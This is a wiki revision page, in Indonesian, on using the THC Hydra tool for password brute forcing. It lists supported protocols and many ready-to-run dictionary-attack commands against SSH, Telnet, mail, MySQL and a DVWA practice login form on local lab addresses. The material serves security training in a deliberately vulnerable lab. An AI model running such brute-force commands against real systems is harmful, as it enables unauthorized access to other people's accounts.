Difference between revisions of "Hydra"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 35: | Line 35: | ||
hydra -V -l admin -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low" | hydra -V -l admin -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low" | ||
+ | |||
+ | hydra -L userdvwa.txt -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low" | ||
+ | |||
hydra -V -l admin -p password "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low" | hydra -V -l admin -p password "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low" | ||
− | '''BISA di COBA, bisa | + | '''BISA di COBA, bisa ERROR''' |
hydra 192.168.0.102 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-get-form "DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=Low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63" | hydra 192.168.0.102 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-get-form "DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=Low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63" |
Revision as of 07:25, 19 February 2020
Hydra adalah network log yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.
System yang di serang
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Contoh
hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban hydra -L userlist.txt -P passwordlist.txt ssh://192.168.0.80 hydra -L userlist.txt -P passwordlist.txt -e ns -u -f ssh://192.168.0.80 hydra -L userlist.txt -P passwordlist.txt -e ns -u -f telnet://192.168.0.80 hydra -L userlist.txt -P passwordlist.txt -e ns -u -f pop3://192.168.0.80 hydra -L userlist.txt -P passwordlist.txt -e ns -u -f imap://192.168.0.80 hydra -L userlist.txt -P passwordlist.txt -e ns -u -f 192.168.0.80 mysql
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 mysql hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 telnet hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh
Untuk DVWA (HTTP-POST-FORM)
hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”
OK
hydra -V -l admin -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
hydra -L userdvwa.txt -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
hydra -V -l admin -p password "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
BISA di COBA, bisa ERROR
hydra 192.168.0.102 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-get-form "DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=Low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63"
hydra 192.168.0.102 -l admin -P testpassword http-get-form "/DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63"
hydra -V -l smithy -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
Referensi
- https://www.thc.org/thc-hydra/
- http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/
General usage and options
- http://www.aldeid.com/wiki/Thc-hydra
- http://resources.infosecinstitute.com/online-dictionary-attack-with-hydra/
HTTP basic auth
- https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
- http://www.sillychicken.co.nz/Security/how-to-brute-force-your-router-in-windows.html
HTTP form based auth
- http://www.art0.org/security/performing-a-dictionary-attack-on-an-http-login-form-using-hydra
- http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html
- http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html
- https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
Multiple protocols
- http://wiki.bywire.org/Hydra
- http://www.attackvector.org/brute-force-with-thc-hydra/
- http://www.madirish.net/content/hydra-brute-force-utility